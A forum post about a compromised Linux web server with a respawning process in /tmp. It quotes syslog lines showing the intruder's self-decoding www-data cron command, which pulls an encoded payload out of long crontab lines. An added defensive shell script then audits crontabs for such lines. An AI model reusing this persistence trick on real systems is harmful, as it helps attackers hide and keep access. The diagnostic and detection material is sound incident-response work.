Re: a compromised machine

Thanks for your help. I didn't make much progress though. However, after killing all these processes, a new one was run

www-data 6059 0.0 0.1 1616 600 ? S 17:31 0:00 /tmp/dlciiqlno x

That means that the process was started at 17:31 today. So I checked the logs (all virtual servers) and there was nothing under 17:31 except for - - [24/Jul/2005:17:31:39 +0200] "GET / HTTP/1.0" 200 3444 "-" "-"

It didn't make much sense to me, so I also checked syslog and it said

Jul 24 17:31:01 soncek /USR/SBIN/CRON[6050]: (www-data) CMD (/bin/echo `crontab -l|grep '.\{666\}'|sed 's/^./echo -e -n/'`|s$
Jul 24 17:31:01 soncek crontab[6054]: (www-data) LIST (www-data)

I killed the process and webserver and at 19:31 the process again started with the same lines in syslog.

What now?
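
The syslog entry above shows a www-data cron job that selects lines of at least 666 characters from its own crontab and has sed replace the first character of each. As an added example (not part of the original post), here is a shell check that flags such lines, comment lines included, along with any job that reads its own crontab. The function names and the sample crontab are constructed for illustration.

```shell
#!/bin/sh
# Audit crontab text for the two traits visible in the syslog entry:
#   long-line : a line of >= 666 characters (what grep '.\{666\}' selects)
#   self-read : a job that runs `crontab -l` on itself
# Comment lines are checked too: the sed expression rewrites the first
# character of the matched line, so the stored line need not be a valid job.

audit_crontab() {
    # Reads crontab text on stdin; prints "lineno:reason:length" per finding.
    # Optional $1 overrides the length threshold (default 666).
    awk -v min="${1:-666}" '
        /^[ \t]*$/         { next }
        length($0) >= min  { printf "%d:long-line:%d\n", NR, length($0); next }
        /crontab[ \t]+-l/  { printf "%d:self-read:%d\n", NR, length($0) }
    '
}

make_sample() {
    # Constructed sample crontab, not taken from the compromised host.
    printf '%s\n' '17 3 * * * /usr/local/bin/rotate-cache'
    printf '#%0699d\n' 0      # 700-character comment line standing in for a stored blob
    printf '%s\n' '31 * * * * /bin/echo `crontab -l` >/dev/null'
}

# Usage on a live system (as root):
#   crontab -l -u www-data | audit_crontab
# Try it on the constructed sample:
#   make_sample | audit_crontab
```

Any finding is a reason to save a copy of the crontab as evidence before removing it with `crontab -r -u www-data`; if www-data has no legitimate cron jobs, listing it in `/etc/cron.deny` keeps the entry from being reinstalled through `crontab`.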


